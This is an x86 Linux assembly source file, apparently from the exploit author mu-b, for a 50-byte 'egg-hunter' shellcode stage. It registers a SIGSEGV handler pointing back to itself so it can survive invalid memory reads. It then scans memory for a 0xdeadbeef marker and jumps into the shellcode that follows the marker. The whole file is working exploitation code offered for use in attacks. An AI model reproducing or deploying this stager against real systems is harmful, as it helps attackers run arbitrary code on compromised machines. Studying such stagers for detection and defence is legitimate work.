;
; Copyright (c) 2007 by <mu-b@digit-labs.org>
;
; 50-byte 32-bit search&jump-signal springboard - (x86-lnx)
; by mu-b - Oct 2006
;

%define __start_addr  0x08102030
%define __flag_val    0xdeadbeef

global get_eip

  mov esp, ebp
  push __start_addr

get_eip:
  ; ecx = EIP
  jmp short __callback

__get_eip_call:
  pop ecx
  lea ecx, [byte ecx-(do_signal-get_eip)]
  jmp short do_signal

__callback:
  call near __get_eip_call

do_signal:
  ; ebx == SIG_SEGV
  lea esp, [ebp-4]
  push byte 11
  pop ebx

  ; signal (ebx, ecx);
  lea eax, [ebx+37]
  int 80h

search:
  ; search for our shellcode header
  pop edi
  lea edx, [edi+1]
  push edx
  mov esi, [edi]

  cmp esi, __flag_val
  jnz search

finish:
  ; execute our shellcode
  lea edi, [edi+4]
  jmp edi